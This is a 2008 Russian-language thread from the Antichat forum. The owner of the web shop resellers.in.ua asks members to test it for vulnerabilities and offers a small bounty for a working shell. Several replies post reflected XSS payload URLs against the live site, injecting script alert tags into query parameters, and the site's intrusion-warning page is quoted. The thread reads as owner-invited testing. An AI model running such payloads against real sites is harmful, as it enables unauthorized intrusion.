Форум АНТИЧАТ - Прошу проверить resellers.in.ua

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Прошу проверить resellers.in.ua (https://forum.antichat.xyz/showthread.php?t=65615)

roleg

27.03.2008 17:34

Прошу проверить resellers.in.ua

Прошу проверить скрипт интернет-магазина resellers.in.ua.
Сделан с легкой руки )) очень страшно с ним работать.
Подскажыте основные баги. Я не останусь в долгу.

P.S. Основа скрипта WMshop 13. Кнопка стоит внизу.

admin@resellers.in.ua

roleg

27.03.2008 21:17

Как писалось на многих форумах что WMshop самый дырявый скрипт среди магазинов... я уже месяц ищу доказательства такого предположения.
Да, в самом скрипте были найдены черные хода в админке и не указаны в документации права chmod на некоторые папки.
Хотелось бы узнать по больше про скрипт.

Piflit

27.03.2008 21:29

_настолько_ неясную капчу я еще не видел...

roleg

27.03.2008 21:59

Будет завтра TrueType с случайным поворотом, размещением, смещением в 3Д и случайной прозрачностью. Спасибо что напомнили +1
Почему неясная? Потому что скрипт только установил и загадил каптчу как мог )))))

Jokester

27.03.2008 22:34

_http://resellers.in.ua/buy_sort.php?com=>'><script>alert(11111111)</script>

xcedz

27.03.2008 22:48

http://resellers.in.ua/list_3.php?rid=24</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>

roleg

27.03.2008 23:01

очень хорошо +
красивые Xss )))

roleg

28.03.2008 16:23

мало... может исходник выложыть?

desTiny

28.03.2008 17:23

пассивка
http://resellers.in.ua/seller.php?name=%3Cb%3Efff%3C/b%3E

Jokester

28.03.2008 19:03

_http://resellers.in.ua/buy.php?tovid=

roleg

28.03.2008 20:58

гг... последний жжет.. в чем уязвимость?
просто в бан-лист попал )))

desTiny

28.03.2008 21:03

Вау,
<resellers.in.ua>

Внимание! Зафиксирована попытка взлома магазина RESELLERS.in.ua Ваш IP xxx.xxx.xxx.xxx занесен в журнал и будет в дальнейшем использован для доказательства вашей неправомерной деятельности в отношении RESELLERS.in.ua Если вы случайно попали на эту страницу, то свяжитесь с администратором по email: admin@resellers.in.ua и объясните обстоятельства данного происшествия!

Jokester

28.03.2008 21:45

Цитата:

Сообщение от roleg

гг... последний жжет.. в чем уязвимость?
просто в бан-лист попал )))

Сообщение уж больно страшное, я уже винт отформатировал, на всякий случай :D

roleg

28.03.2008 21:46

Цитата:

Сообщение от desTiny

А я о чем :D , и ты в бан лист попал... мне его уже чистить надоело )))

roleg

28.03.2008 22:00

кто найдет дырку и сможет предоставить рабочий шел получит от меня 10 Wmz на кошель )

LAEOT

28.03.2008 22:10

Hello Roleg,
Here are some xss already :
1.
http://resellers.in.ua/list_1.php?rid=41&lst=1'="><script>alert(/XSS-BY-LAEOT/)</script>&sort=date&rv=true
2.
http://resellers.in.ua/list_3.php?rid=200'="><script>alert(/XSS-BY-LAEOT/)</script>&ps=0
I want to test your site but I don't have a WM - идентификатор (so I can't make an account).
Do you have a test account for me?

roleg

28.03.2008 22:42

Цитата:

Сообщение от LAEOT

My apologies, for Americans the given kind of payment translations does not roll. And xss me do not interest.

xcedz

28.03.2008 23:10

Цитата:

Сообщение от roleg

кто найдет дырку и сможет предоставить рабочий шел получит от меня 10 Wmz на кошель )

деньги зло. :( если будет shell ты его не получишь ;)

roleg

28.03.2008 23:59

Цитата:

Сообщение от xcedz

деньги зло. :( если будет shell ты его не получишь ;)

гг) да, зло... но я же как лучше хочу ;)

desTiny

29.03.2008 00:26

А!!! Убери пост с логами, бессовестный ты человек!! :)

roleg

29.03.2008 00:36

Цитата:

Сообщение от desTiny

А!!! Убери пост с логами, бессовестный ты человек!! :)

кто ж с реальным айпи ходит... :) мой сайт же не на моем хостинге.. :D

Время: 04:46